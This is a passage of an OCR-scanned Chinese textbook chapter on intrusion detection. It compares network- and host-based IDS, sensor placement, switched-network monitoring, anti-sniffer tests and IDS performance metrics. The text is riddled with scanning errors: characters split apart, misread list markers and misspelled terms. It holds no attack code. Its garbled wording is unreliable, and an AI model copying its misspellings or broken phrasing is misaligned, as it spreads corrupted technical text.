NFR shadow 等 ,其 中 snort 最 著名 ,其 研发 进展 和 更 新 速度 均 超 过 大 部 分 同类 产品 。 

由 于 NIDS 不 像 路 由 器 ,防火墙 等 关键 设备 方式 工作 , 它 不 会 成 为 系统 中 的 关键 路 径 。 
NIDS 发 生 故 障 不 会 影响 正常 业务 的 运行 。NIDS 只 检查 它 直 接连 接 的 网 段 通信 状态 ,不 检 
测 其 他 网 段 的 数据 包 。 在 交换 式 以 太 网 中 会 出 现 监视 范围 的 局 限 。NIDS 通常 采用 特征 检 
测 手段 ,对 一 些 复 杂 的 计算 与 分 析 的 攻击 较 难 检测 到 。 

NIDS 使 用 原始 网 络 包 作为 数据 源 。NIDS 通常 利用 一 个 运行 在 随机 模式 下 的 网 络 适 
配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 通信 业务 。 它 的 攻击 辨识 模块 通常 使 用 4 种 常用 技 
术 来 识别 攻击 标志 : 模式 、 表 达 式 或 字 节 匹配 ; 频率 或 穿越 阔 值 ; 低级 事件 的 相关 性 ; 统计 
学 意义 上 的 非常 规 现 象 检测 。 

一 旦 检测 到 了 攻击 行为 ,IDS 的 响应 模块 就 提供 多 种 选项 以 通知 、 报 警 并 对 攻击 采取 相 
应 的 反应 。 反 应 因 系统 而 异 ,通常 都 包括 通知 管理 员 、. 中 断 连 接 并 且 / 或 为 法 庭 分 析 和 证 据 
收集 而 做 的 会 话 记录 。 

NIDS 已 经 成 为 安全 策略 实施 的 重要 组 件 , 它 有 许多 仅 靠 HIDS 无 法 提供 的 优点 。 

CD 拥有 成 本 较 低 。NIDS 可 在 几 个 关键 访问 点 上 进行 策略 配置 ,以 观察 发 往 多 个 系统 
的 网 络 通信 ,所 以 它 不 要 求 在 许多 主机 上 装载 并 管理 软件 。 由 于 需 监 测 的 点 较 少 ,因此 对 于 

一 个 公司 的 环境 来 说 ,其 拥有 成 本 很 低 。 

(2) 检测 HIDS 漏 掉 的 攻击 。NIDS 检查 所 有 包 的 头 部 ,从 而 发 现 恶意 的 和 可 疑 的 行动 
迹象 。HIDS 无 法 查看 包 的 头 部 ,所 以 它 无 法 检测 到 这 一 类 型 的 攻击 。 例 如 ,许多 来 自 IP 
地 址 的 拒绝 服务 型 和 碎片 型 攻击 只 能 在 它们 经 过 网 络 时 ,都 可 以 在 NIDS 中 通过 实时 监测 
包 流 而 被 发 现 。 

NIDS 可 以 检查 有 效 负载 的 内 容 ,查找 用 于 特定 攻击 的 指令 或 语法 。 例 如 ,通过 检查 数 
据 包 有 效 负载 可 以 查 到 黑客 软件 ,而 使 正在 寻找 系统 漏洞 的 攻击 者 毫 无 察觉 。 由 于 HIDS 
不 检查 有 效 负载 ,所 以 不 能 辨认 有 效 负载 中 所 包含 的 攻击 信息 。 

(3) 攻击 者 不 易 转 移 证 据 。NIDS 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 的 检测 ,所 以 
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攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包括 攻击 的 方法 ,还 包括 可 识别 的 入 侵 者 身份 及 
对 其 进行 起 诉 的 信息 。 许 多 人 侵 者 都 熟知 审计 记录 ,他 们 知道 如 何 操纵 这 些 文件 掩盖 他 们 
的 人 侵 痕迹 ,来 阻止 需要 这 些 信息 的 HIDS 去 检测 入 侵 。 

(4) 实时 检测 和 响应 。NIDS 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同时 将 其 检测 出 来 ,并 做 
出 更 快 的 通知 和 响应 。 例 如 ,一 个 基于 TCP 的 对 网 络 进行 的 拒绝 服务 攻击 可 以 通过 将 
NIDS 发 出 TCP 复位 信号 ,在 该 攻击 对 目标 主机 造成 破坏 前 将 其 中 断 。 而 HIDS 只 有 在 可 
疑 的 登录 信息 被 记录 下 来 以 后 才能 识别 攻击 并 做 出 反应 。 而 这 时 关键 系统 可 能 早 就 遭 到 了 
破坏 ,或 是 运行 HIDS 的 系统 已 被 摧毁 。 

(5) 检测 未 成 功 的 攻击 和 不 良 意 图 。NIDS 增加 了 许多 有 价值 的 数据 ,以 判别 不 良 意 
图 。 即 便 防 火 墙 可 以 正在 拒绝 这 些 尝试 ,位 于 防火 墙 之 外 的 NIDS 可 以 查 出 躲 在 防火 墙 后 
的 攻击 意图 。HIDS 无 法 查 到 从 未 攻击 到 防火 墙 内 主机 的 未 遂 攻 击 ,而 这 些 丢 失 的 信息 对 
于 评估 和 优化 安全 策略 是 至 关 重 要 的 。 

(6) 操作 系统 无 关 性 。NIDS 作为 安全 监测 资源 ,与 主机 的 操作 系统 无 关 。 与 之 相 比 ， 
HIDS 必须 在 特定 的 .没有 遭 到 破坏 的 操作 系统 中 才能 正常 工作 ,生成 有 用 的 结果 。 

NIDS 有 向 专门 的 设备 发 展 的 趋势 ,安装 这 样 的 一 个 NIDS 非常 方便 ,只 需 将 定制 的 设 
备 接 上 电源 ,做 很 少 一 些 配 置 ,将 其 连 到 网 络 上 即 可 。 

NIDS 也 有 以 下 弱点 。 

(D NIDS 只 检查 它 直 接连 接 网 段 的 通信 ,不 能 检测 在 不 同 网 段 的 网 络 包 。 在 使 用 交换 
以 太 网 的 环境 中 就 会 出 现 监测 范围 的 局 限 。 而 安装 多 台 NIDS 的 传感器 会 使 部 署 整个 系统 
的 成 本 大 大 增加 。 

(2) 为 了 性 能 目标 ,NIDS 通常 采用 特征 检测 的 方法 , 它 可 以 检测 出 普通 的 一 些 攻 击 , 而 
很 难 实现 一 些 复杂 的 需要 大 量 计算 与 分 析 时 间 的 攻击 检测 。 

(3) NIDS 可 能 会 将 大 量 的 数据 传 回 分 析 系 统 中 。 在 一 些 系 统 中 监听 特定 的 数据 包 会 
产生 大 量 的 分 析 数 据 流 量 。 一 些 系统 在 实现 时 采用 一 定 方法 来 减少 回 传 的 数据 量 ,对 入 侵 
判断 的 决策 由 传感器 实现 ,而 中 央 控 制 台 成 为 状态 显示 与 通信 中 心 ,不 再 作为 人 侵 行 为 分 析 
器 。 这 样 的 系统 中 的 传感器 协同 工作 能 力 较 弱 。 

(4) NIDS 处 理 加 密 的 会 话 过 程 较 困难 ,目前 通过 加 密 通 道 的 攻击 尚 不 多 ,但 随 着 IPv6 
的 普及 ,这 个 问题 会 越 来 越 突出 。 

3. 分 布 式 入 侵 检 测 系 统 

目前 这 种 技术 在 ISS 的 RealSecure 等 产品 中 已 经 有 了 应 用 。 它 检测 的 数据 也 是 来 源 
于 网 络 中 的 数据 包 , 不 同 的 是 , 它 采 用 分 布 式 检测 、 集 中 管理 的 方法 。 即 在 每 个 网 段 安装 一 
个 黑匣子 ,该 黑匣子 相当 于 NIDS, 只 是 没有 用 户 操作 界面 。 黑 匣子 用 来 监测 其 所 在 网 段 上 
的 数据 流 , 它 根据 集中 安全 管理 中 心 制定 的 安全 策略 、 响 应 规则 等 来 分 析 检 测 网 络 数据 , 同 
时 向 集中 安全 管理 中 心 发 回 安全 事件 信息 。 集 中 安全 管理 中 心 是 整个 NIDS 面向 用 户 的 界 
面 。 它 的 特点 是 对 数据 保护 的 范围 比较 大 ,但 对 网 络 流量 有 一 定 的 影响 。 

4. 基于 主机 和 基于 网 络 的 入 侵 检测 比较 

HIDS 和 NIDS 都 有 其 优势 和 劣势 ,两 种 方法 互 为 补充 。 一 种 真正 有 效 的 IDS 应 将 二 
者 结合 。HIDS 和 NIDS 的 比较 见 表 5-1。 
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表 5-1 HIDS 和 NIDS 的 比较 
基于 网 络 基于 主机 
可 以 检测 到 基于 主机 所 忽略 的 攻击 , 即 DoS、BackOfice 可 以 检测 到 基于 网 络 所 忽略 的 攻击 :来 自 关 键 服务 
器 键盘 的 攻击 (内 部 ,不 经 过 网 络 ) 等 





攻击 者 更 难 抹 去 攻击 的 证 据 可 以 事后 比较 成 功 和 失败 的 攻击 
实时 检测 并 响应 接近 实时 检测 和 响应 

检测 不 成 功 的 攻击 和 恶意 企图 监测 系统 特定 的 行为 

独立 于 操作 系统 很 好 地 适应 加 密 和 交换 网 络 环境 
可 以 监测 活动 的 会 话 情 况 不 能 

给 出 网 络 原始 数据 的 日 志 不 能 

终止 TCP 连接 终止 用 户 的 登录 

重新 设置 防火 墙 封杀 用 户 账号 

探 针 可 以 分 布 在 整个 网 络 并 向 管理 站 报告 只 能 保护 配置 引擎 或 代理 的 主机 


5.2.2 按照 检测 方法 划分 


根据 工作 方式 可 分 为 离线 检测 系统 与 在 线 检测 系统 。 

CD 离线 检测 系统 。 离 线 检测 系统 是 非 实 时 工作 的 系统 , 它 在 事后 分 析 审 计 事件 ,从 中 
检查 入 侵 活动 。 事 后 入 侵 检 测 由 网 络 管理 人 员 进 行 , 他 们 具有 网 络 安全 的 专业 知识 ,根据 计 
算 机 系统 对 用 户 操作 所 做 的 历史 审计 记录 判断 是 否 存在 入 侵 行为 ,如 果 有 就 断 开 连接 ,并 记 
录入 侵 证 据 和 进行 数据 恢复 。 事 后 入 侵 检测 是 管理 员 定 期 或 不 定期 进行 的 ,不 具有 实时 性 。 

(2) 在 线 检测 系统 。 在 线 检测 系统 是 实时 联机 的 检测 系统 , 它 包 含 对 实时 网 络 数据 包 
分 析 、 实 时 主机 审计 分 析 。 其 工作 过 程 是 实时 入 侵 检 测 在 网 络 连 接 过 程 中 进行 ,系统 根据 用 
户 的 历史 行为 模型 .存储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 当 前 的 操作 进行 
判断 ,一 旦 发 现 入 侵 迹 象 ,立即 断 开 入 侵 者 与 主机 的 连接 ,并 收集 证 据 和 实施 数据 恢复 。 这 
个 检测 过 程 是 不 断 循环 进行 的 。 


5.3 人 侵 检测 系统 的 工作 原理 


入 侵 检测 无 论 是 基于 何 种 类 型 ,如 主机 、 网 络 .应 用 程序 和 目标 ,或 者 是 几 种 类 型 的 集成 
系统 ,要 实现 检测 的 目的 ,收集 信息 都 是 首要 的 任务 ; 只 有 收集 到 大 量 有 用 的 信息 ,才能 进 
行 有 效 的 数据 分 析 ; 只 有 进行 有 效 的 模式 匹配 、 统 计 分 析 和 完整 性 分 析 ,才能 获得 正确 的 结 
论 , 采 取 积 极 主动 的 安全 防护 技术 。 

1. 信息 收集 

信息 收集 的 内 容 包 括 系 统 、 网 络 ,数据 及 用 户 活动 的 状态 及 其 行为 。 信 息 收集 要 在 不 同 网 
段 , 不 同 主机 .不同 关 键 点 。 只 有 来 源 广泛 的 信息 ,才能 从 不 一 致 的 信息 中 找 出 入 侵 者 的 踪迹 。 

入 侵 检 测 利用 的 信息 一 般 来 源 于 以 下 4 个 方面 。 

d) 系统 和 网 络 日 志文 件 是 检测 的 必要 条 件 。 通 过 查看 日 志文 件 能 够 发 现成 功 的 人 侵 
或 攻击 企图 ,并 启动 相应 的 应 急 响 应 程序 。 日 志文 件 记 录 各 种 行为 类 型 ,如 用 户 活动 , 它 包 
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含 登 录 、 用 户 ID .文件 访问 .授权 和 认证 信息 等 。 很 明显 用 户 的 异常 登录 及 访问 企图 ,都 是 
必须 收集 的 信息 。 

(2) 系统 目录 和 文件 的 异常 改变 。 目 录 和 文件 的 异常 改变 ,特别 是 那些 限制 访问 的 信 
息 ,如 发 现 被 修改 .替换 或 破坏 的 情况 ,很 可 能 是 黑客 人 侵 的 信号 。 

O 程序 执行 中 的 异常 行为 。 网 络 系统 上 的 程序 执行 一 般 包括 操作 系统 、 网 络 服务 、 用 
户 启动 的 程序 和 特定 目的 的 应 用 ,如 数据 库 服务 器 。 每 个 程序 执行 由 一 个 或 多 个 进程 来 实 
现 ,不 同 权 限 的 环境 控制 着 过 程 可 访问 的 系统 资源 ,程序 和 数据 文件 等 。 一 个 进程 的 执行 操 
作 方 式 不 同 , 它 利用 的 系统 资源 也 不 同 。 它 所 执行 的 操作 包括 计算 、 文 件 传输 、 设 备 和 其 他 
进程 及 其 进程 间 的 通信 。 

一 个 进程 出 现 异常 ,表明 黑客 有 可 能 入 侵 系统 ,正在 将 程序 或 服务 的 运行 分 解 ,从 而 导 
致 进程 失败 ,或 者 黑客 正在 进行 某 种 方式 的 非法 操作 。 

(4) 物理 形式 的 入 侵 信 息 。 对 网 络 硬件 的 未 授权 连接 和 对 物理 资源 的 未 授权 访问 ,就 
是 物理 形式 的 人 侵 行为 。 黑 客 常 利用 网 络 用 户 自 加 的 不 安全 的 设备 作为 访问 内 部 网 络 的 后 
门 ,从 而 突破 原 有 的 安全 防护 措施 进攻 其 他 系统 ,窃取 私有 敏感 信息 。 

2. 数据 分 析 

上 述 收集 到 的 各 种 信息 ,一 定 要 进行 3 种 技术 手段 的 分 析 。 其 中 模式 匹配 ,统计 分 析 为 
实时 的 人 侵 检 测 ,完整 性 分 析 则 是 事后 分 析 。 

COD 模式 匹配 。 模 式 匹配 是 将 收集 到 的 信息 与 已 知 网 络 入 侵 和 系统 误 用 模式 数据 库 进 
行 比较 ,从 而 发 现 违背 安全 策略 的 行为 。 该 过 程 或 者 简单 或 者 复杂 ,其 方法 的 优点 是 只 需 收 
集 相 关 的 数据 集合 ,从 而 显著 地 减轻 系统 负担 , 且 技术 相当 成 熟 。 检 测 准确 率 和 效率 相当 
高 。 但 是 很 难 对 付 不 断 升级 或 更 新 的 攻击 手段 。 

(2) 统计 分 析 。 统 计 分 析 方 法 首先 给 系统 对 象 (如 用 户 文件 .目录 和 设备 等 ) 创 建 工 作 
统计 描述 以 及 统计 正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失败 次 数 和 延 时 等 )。 测 
量 属 性 的 平均 值 将 被 用 来 与 网 络 ,系统 的 行为 进行 比较 , 当 任何 观察 值 在 正常 值 范围 之 外 
时 ,就 认为 有 和 人 侵 发 生 。 

统计 分 析 的 优点 是 可 检测 到 未 知 的 入 侵 或 更 为 复杂 的 入 侵 , 缺 点 是 误 报 、 漏 报 率 高 , 且 
不 适应 用 户 正 常 行为 的 突然 改变 。 

目前 有 基于 专家 系统 的 、 基 于 模型 推理 的 和 基于 神经 网 络 的 统计 分 析 方法 。 

(3) 完整 性 分 析 。 完 整 性 分 析 主要 分 析 某 个 文件 或 对 象 是 否 被 更 改 , 它 包括 文件 和 目 
录 的 内 容 及 属性 , 它 在 发 现 被 更 改 的 、 被 特洛伊 化 的 应 用 程序 方面 特别 有 效 。 因 为 完整 性 分 
析 利 用 单 向 散 列 函 数 MD5 ,可 以 识别 任何 微小 的 变化 。 这 种 方法 可 以 发 现 人 侵 导 致 的 文件 
或 对 象 的 变化 。 但 该 方法 不 适用 于 实时 响应 , 它 可 在 每 一 天 的 特定 时 间 内 进行 全 面 的 扫描 
检查 ,以 便 对 内 部 攻击 、 外 部 攻击 和 误 操作 造成 的 危害 采取 保护 措施 。 


5.4 人 侵 检测 系统 的 应 用 问题 


目前 ,IDS 已 成 为 安全 体系 结构 中 不 可 缺少 的 一 个 环节 。 但 是 ,IDS 在 理论 上 和 实际 应 
用 中 仍然 存在 着 许多 尚 待 解决 的 问题 。 例 如 , 现 有 的 IDS 在 10Mb/s 网 上 检查 所 有 数据 包 
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中 的 几 十 种 攻击 特征 时 可 以 很 好 地 工作 ,而 在 10Mb/s, 100Mb/s 甚至 千 兆 网 络 上 ,数据 包 
分 析 技 术 就 力不从心 了 。 另 外 ,网 络 的 发 展 速度 .交换 机 的 大 规模 使 用 .针对 IDS 的 攻击 
等 ,也 不 断 地 向 IDS 提出 新 的 问题 。 


5.4.1 检测 器 的 安装 位 置 


一 般 的 IDS 分 为 分 析 系 统 、 存 储 系 统 和 控制 台 等 几 个 部 分 ,对 于 一 个 小 型 网 络 ,上 述 几 
部 分 可 安装 在 同一 台 计 算 机 上 , 既 节 省 使 用 成 本 ,也 提高 反应 速度 。 在 大 型 网 络 中 ,分 析 系 
统 工作 负载 大 ,存储 系统 工作 量 也 大 ,所 以 应 该 分 装 在 不 同 的 计算 机 上 。 

对 于 HIDS, 其 数据 采集 部 分 应 该 位 于 其 所 监测 的 主机 上 。NNIDS 需要 有 检测 器 才能 
[ 作 。 如 果 检 测 器 安装 位 置 不 正确 ,NIDS 工作 状态 就 会 受到 影响 。 一 般 情况 下 ,检测 器 安 
装 位 置 有 以 下 几 种 选择 。 

1. 安装 在 防火 墙 之 外 

检测 器 通常 安置 在 防火 墙 以 外 的 DMZ。DMZ 介 于 因特网 服务 供应 商 ISP 和 最 外 端 防 
火 墙 界面 之 间 的 区 域 。 这 种 安排 使 检测 器 可 以 看 见 所 有 来 自 因特网 的 攻击 。 

但 是 ,如 果 攻 击 类 型 是 TCP 攻击 ,而 防火 墙 或 过 滤 路 由 器 能 封锁 该 攻击 ,那么 IDS 可 能 
就 检测 不 到 。 因 为 TCP 攻击 要 求 进行 三 次 握手 才能 完成 传送 任务 ,而 入 侵 检 测 对 许多 攻击 
类 型 只 能 通过 检测 与 字符 串 特征 是 否 一 致 的 方法 才能 被 发 现 。 

虽然 有 些 攻击 不 能 检测 到 ,但 DMZ 仍然 是 安装 检测 器 的 最 佳 位 置 。 在 该 处 可 以 看 到 
自己 的 站 点 和 防火 墙 暴露 在 多 少 种 攻击 之 下 。 

2. 安装 在 防火 墙 之 内 

如 果 检 测 器 安装 在 防火 墙 之 内 ,就 会 少 受 一 些 干扰 ,可 以 减少 误 报 警 ,也 会 减少 受 攻击 
的 机 会 。 如 果 本 应 该 被 防火 墙 封锁 的 攻击 渗透 进来 ,检测 器 也 可 以 检测 出 来 并 且 还 能 发 现 
防火 墙 的 设置 失误 。 总 之 ,让 防火 墙 去 阻止 大 部 分 的 低层 次 的 攻击 ,才能 使 检测 器 有 充分 的 
时 间 对 付 高 层次 或 更 深入 的 网 络 攻击 。 

3. 防火 墙 内 外 都 安装 检测 器 

如 果 有 足够 的 经 费 这 么 做 ,自然 有 以 下 优点 : 无 须 猜测 是 否 有 攻击 渗透 过 防火 墙 ; 可 
以 检测 来 自 内 部 或 外 部 的 攻击 ; 可 以 检测 到 由 于 设置 有 问题 而 无 法 通过 防火 墙 的 内 部 系 
统 ,这 对 系统 管理 员 有 利 。 

4. 检测 器 安装 在 其 他 位 置 

许多 IDS 也 可 以 在 不 同位 置 支持 系统 的 检测 工作 。 例 如 ,数据 有 较 高 价值 或 较 敏 感 的 
位 置 ; 又 如 有 大 量 不 稳定 的 流动 用 户 的 地 方 或 已 被 当 作 攻 击 目标 的 子 网 内 。 


5.4.2 检测 器 应 用 于 交换 机 环境 中 应 注意 的 问题 


检测 器 可 以 在 交换 机 环境 中 工作 ,但 如 果 交 换 机 的 路 接 端口 没有 正确 设置 ,入 侵 检测 将 
无 法 进行 工作 。 如 果 检 测 器 要 在 交换 网 络 中 工作 ,就 必须 对 它 进 行 测试 以 保证 它 能 从 交换 
位 置 可 靠 地 发 送 数据 。 

NIDS 都 是 工作 在 网 卡 混杂 模式 下 ,早期 使 用 集线器 (Hub) 作 为 连接 设备 ,NDIS 可 以 
监听 到 网 络 中 所 有 的 数据 包 。 随 着 交换 机 的 大 量 使 用 ,检测 器 必须 配置 两 块 接口 卡 ,一 块 连 
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接 到 网 络 跨 接 端口 ,用 于 监听 混杂 模式 下 的 数据 包 , 另 一 块 连接 到 单独 的 VLAN ,用 来 与 分 
析 工 作 站 进行 通信 。 

由 于 交换 机 不 采用 共享 信道 的 传送 方法 ,传统 的 嗅 探 程序 sniffer 监听 整个 子 网 的 办 法 
不 再 可 行 。 下 面 是 几 种 可 行 的 解决 办 法 。 

1. 检测 器 接 到 交换 机 的 核心 芯片 上 的 调试 端口 

如 果 交 换 机 厂商 把 核心 芯片 的 调试 端口 开放 出 来 ,用 户 可 将 IDS 系统 接 到 此 端口 上 。 
该 端口 可 以 监听 到 任何 其 他 端口 的 进出 信息 。 这 种 接 法 无 须 改 变 IDS 的 体系 结构 ,但 会 降 
低 交换 机 性 能 。 

2. 检测 器 安装 在 交换 机 或 防火 墙 内 部 的 关键 接口 

这 种 连接 方法 必须 与 其 他 厂商 紧密 合作 ,其 优点 是 可 以 得 到 几乎 所 有 的 关键 数据 ,但 它 
会 降低 网 络 的 性 能 。 

3. 采用 分 接 器 将 检测 器 接 到 监测 线路 

利用 分 接 器 (Tap) 的 网 络 结构 如 图 5-6 所 示 。 
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5-6 采用 分 接 器 连接 IDS 示意 图 


这 种 连接 方式 可 以 在 不 降低 网 络 性 能 的 前 提 下 收集 到 所 需 的 信息 。 但 是 , 若 保护 的 资 
源 众多 ,IDS 必须 配备 众多 的 额外 设备 (分 接 器 )。 

4. 使 用 具有 网 络 接口 检测 功能 的 主机 代理 

代理 主机 的 优点 在 于 可 以 将 被 保护 网 络 内 部 的 结构 屏蔽 起 来 ,增强 网 络 的 安全 性 能 , 同 
时 还 可 以 实施 较 强 的 数据 流 监控 ,日 志 记录 和 审计 报告 的 功能 。 从 这 一 点 看 ,NIDS 与 防火 
墙 有 类 似 的 地 方 ,但 是 ,它们 是 两 种 作用 不 同 的 设备 。 

防火 墙 的 作用 是 保护 设备 。 这 意味 着 所 有 网 络 传输 都 必须 通过 防火 墙 才能 从 网 络 的 一 
部 分 传 向 另 一 部 分 。 如 果 防 火 墙 受到 攻击 ,其 服务 都 被 破坏 , 则 它 将 会 在 失效 后 关闭 ,也 就 
不 会 有 传输 通过 。 这 样 会 使 所 有 传输 都 中 断 , 并 阻止 攻击 者 趁机 攻击 内 部 主机 。 

NIDS 不 是 位 于 网 络 段 之 间 ,而 被 设计 成 用 于 在 单个 冲突 域 中 隐 含 地 和 运行。 如果 NIDS 
失效 , 它 会 在 失效 后 打开 ,因为 传输 流 并 没有 被 打 断 。 攻 击 者 在 NIDS 失效 后 ,可 以 获得 对 
网 络 资源 的 访问 。 这 就 意味 着 ,在 NIDS 离线 时 ,所 有 的 攻击 行为 都 将 不 会 被 记 入 文档 。 


5.4.3 反 嗅 探 技 术 


当 攻击 者 成 功 入 侵 系统 后 ,首先 安装 一 个 嗅 探 器 程序 sniffer, 使 网 卡 处 于 混杂 模式 状 
态 。 这 样 攻击 者 可 以 得 到 用 户口 令 以 及 信用 卡 账号 ,可 以 窃听 E-mail 等 。 反 嗅 探 器 (anti- 
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sniffer) 技 术 的 目的 就 是 发 现 网 络 中 的 哪些 主机 处 于 混杂 模式 ,通过 这 种 方法 发 现 人 侵 者 。 
但 是 ,IDS 使 用 了 与 sniffer 相同 的 技术 ,也 处 于 混杂 模式 下 。 所 以 ,antirsniffer 技术 同样 被 
攻击 者 利用 来 发 现 哪 些 主机 上 安装 了 IDS。 

目前 ,常见 的 anti-sniffer 技术 有 下 面 几 种 。 

1. DNS Test 

这 种 方法 在 网 络 中 产生 大 量 假 的 TCP 连接 ,有 些 sniffer 程序 会 对 这 些 IP 地 址 做 反 向 
DNS 查询 。 由 于 对 本 来 不 存在 的 IP 地 址 进行 DNS 查询 ,就 使 anti-sniffer 通过 监视 这 些 
DNS 查询 很 容易 就 能 确定 该 目标 是 否 在 进行 网 络 窃听 。 

2. Etherping Test 

这 种 测试 方法 是 否 成 功 取决 于 目标 主机 的 操作 系统 。 发 送 一 个 ICMP Echo 数据 包 到 
目标 主机 ,这 个 包 具 有 正确 的 IP 地 址 ,但 是 错误 的 MAC 地 址 会 使 大 多 数 的 操作 系统 简单 
地 丢弃 该 包 。 由 于 网 卡 处 在 混杂 模式 情况 下 , 某 些 版 本 的 Linux, NetBSD 会 响应 具有 错误 
MAC 地 址 的 IP 数据 包 。 注 意 ,伪造 的 以 太 网 数据 包 应 将 IP 地 址 设 为 广播 地 址 。 

3. ARP Test 

向 目标 主机 发 送 一 个 ARP 请 求 , 除 了 MAC 地 址 错误 外 ,其 他 信息 都 正确 ,如 果 目 标 主 
机 不 处 在 混杂 模式 状态 下 ,那么 它 根本 见 不 到 该 数据 包 , 和 否则 目标 主机 将 会 对 该 ARP 请 求 
进行 响应 。 

4. ICMPPing Latency Test 

这 种 类 型 的 测试 是 最 有 效 的 测试 , 它 能 够 发 现 网 络 中 处 于 混杂 模式 的 任何 操作 系统 的 
计算 机 。 但 是 这 种 测试 会 在 很 短 的 时 间 内 产生 巨大 的 网 络 通信 流量 。 进 行 这 种 测试 的 理由 
是 不 处 于 混杂 模式 的 网 卡 提供 了 一 定 的 硬件 底层 过 滤 机 制 。 目 标 地 址 非 本 地 (广播 地 址 除 
外 ) 的 数据 包 将 被 网 卡 丢 弃 , 而 处 于 混杂 模式 下 的 计算 机 缺乏 此 类 底层 的 过 滤 ,又 然 增加 的 
数据 包 会 使 响应 时 间 变 化 量 超出 平常 1 一 4 个 数量 级 。 通 过 向 目标 发 出 ICMP Ping 数据 
包 , 再 测试 RTT(Round Trip Time) ,就 可 判断 目标 主机 是 否 运 行 了 sniffer 程序 。 

目前 ,由 安全 公司 LOpht 开发 的 anti-sniff 反 嗅 探 工具 软件 ,为 了 对 付 攻击 者 的 多 种 工 
H..anti-sniff 进行 3 种 网 络 饱和 度 测试 。 

Q) SIXTYSI 测 试 构造 的 数据 包 , 数 据 全 为 0x66。 这 些 数据 包 不 会 被 非 混杂 模式 的 机 
器 接收 ,同时 方便 使 用 常见 的 网 络 监 听 或 分 析 工 具 ( 如 Tepdunp 和 snoop 等 ) 记 录 和 捕获 。 

(2) TCP SYN 测试 构造 的 数据 包 。 这 些 数 据 包含 有 效 的 TCP KA IP 头 ,同时 TCP 
标志 域 的 SYN 位 被 设置 。 

(3) THREE WAY 测 试 构造 的 数据 包 。 与 TCP SYN 测试 的 原理 基本 一 样 ,但 更 复 
杂 。 在 该 测试 中 两 个 实际 不 存在 的 机 器 间 多 次 建立 完整 的 TCP 三 次 握手 通信 ,以 便 欺骗 
sniffer. 

anti-sniff 能 够 通过 以 上 3 种 数据 包 测 试 混杂 模式 的 机 器 ,可 以 周期 性 地 进行 测试 ,并 
与 以 前 的 数据 进行 比较 。 响 应 时 间 测 试 第 一 次 运行 的 数据 还 能 够 用 于 分 析 一 个 大 型 网 络 在 
Flooding 和 非 Flooding 状态 的 性 能 ,并 帮助 管理 员 调整 网 络 性 能 。 
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5.5 人 侵 检 测 系统 的 性 能 指标 


对 于 IDS, 用 户 会 关注 每 秒 能 处 理 的 网 络 数据 流量 .每 秒 能 监控 的 网 络 连 接 数 等 指标 。 
但 除了 上 述 指标 外 ,其 实 一 些 不 为 一 般 用 户 了 解 的 指标 甚至 更 重要 ,如 每 秒 抓 包 数 、 每 秒 能 
够 处 理 的 事件 数 等 。 

1. 每 秒 数据 流量 

每 秒 数据 流量 是 指 网 络 上 每 秒 通过 某 节 点 的 数据 量 。 这 个 指标 是 反映 NIDS 性 能 的 重 
要 指标 ,一般 用 Mb/s 来 衡量 ,如 10Mb/s.100Mb/s 和 1Gb/s。 

NIDS 的 基本 工作 原理 是 嗅 探 (Sniffer) , 它 通过 将 网 卡 设置 为 混杂 模式 ,使 得 网 卡 可 以 
接收 网 络 接口 上 的 所 有 数据 。 

如 果 每 秒 数据 流量 超过 网 络 传感器 的 处 理 能 力 ,NIDS 就 可 能 会 丢 包 ,从 而 不 能 正常 检 
测 攻击 。 但 是 NIDS 是 否 会 丢 包 ,不 取决 于 每 秒 数据 流量 ,而 主要 取决 于 每 秒 抓 包 数 。 

2. 每 秒 抓 包 数 

每 秒 抓 包 数 是 反映 NIDS 性 能 的 最 重要 的 指标 。 因 为 系统 不 停 地 从 网 络 上 抓 包 ,对 数 
据 包 作 分 析 和 处 理 ,查找 其 中 的 入 侵 和 误 用 模式 。 所 以 ,每 秒 所 能 处 理 的 数据 包 的 多 少 反 映 
了 系统 的 性 能 。 业 界 不 熟悉 IDS 的 往往 把 每 秒 网 络 流量 作为 判断 NIDS 的 决定 性 指标 ,这 
种 想法 是 错误 的 。 每 秒 网 络 流量 等 于 每 秒 抓 包 数 乘 以 网 络 数据 包 的 平均 大 小 。 由 于 网 络 数 
据 包 的 平均 大 小 差异 很 大 时 ,在 相同 抓 包 率 的 情况 下 ,每 秒 网 络 流量 的 差异 也 会 很 大 。 例 
如 ,网 络 数据 包 的 平均 大 小 为 1024B 左右 ,系统 的 性 能 能 够 支持 10 000p/s 的 每 秒 抓 包 数 ， 
那么 系统 每 秒 能 够 处 理 的 数据 流量 可 达到 78Mb/s, 当 数据 流量 超过 78Mb/s 时 ,会 因为 系 
统 处 理 不 过 来 而 出 现 丢 包 现 象 ; 如 果 网 络 数据 包 的 平均 大 小 为 512B 左右 ,在 10 000p/s 的 
每 秒 抓 包 数 的 性 能 情况 下 ,系统 每 秒 能 够 处 理 的 数据 流量 可 达到 40Mb/s, 当 数据 流量 超过 
40Mb/s 时 ,就 会 因为 系统 处 理 不 过 来 而 出 现 丢 包 现象 。 

在 相同 的 流量 情况 下 ,数据 包 越 小 ,处 理 的 难度 越 大 。 小 包 处 理 能 力 , 也 是 反映 防火 墙 
性 能 的 主要 指标 。 

3. 每 秒 能 监控 的 网 络 连 接 数 

NIDS 不 仅 要 对 单个 的 数据 包 作 检测 ,还 要 将 相同 网 络 连 接 的 数据 包 组 合 起 来 进行 分 
析 。 网 络 连接 的 跟踪 能 力 和 数据 包 的 重组 能 力 是 NIDS 进行 协议 分 析 、 应 用 层 入 侵 分 析 的 
基础 。 这 种 分 析 延 伸 出 很 多 NIDS 的 功能 ,如 检测 利用 HTTP 协议 的 攻击 、 敏 感 内 容 检测 、 
邮件 检测 Telnet 会 话 的 记录 与 回放 、 硬 盘 共 享 的 监控 等 。 

4. 每 秒 能 够 处 理 的 事件 数 

NIDS 检测 到 网 络 攻击 和 可 疑 事件 后 ,会 生成 安全 事件 或 称 报警 事件 ,并 将 事件 记录 在 
事件 日 志 中 。 每 秒 能 够 处 理 的 事件 数 ,反映 了 检测 分 析 引 擎 的 处 理 能 力 和 事件 日 志 记 录 的 
后 端 处 理 能 力 。 有 的 厂商 将 反映 这 两 种 处 理 能 力 的 指标 分 开 , 称 为 事件 处 理 引 擎 的 性 能 参 
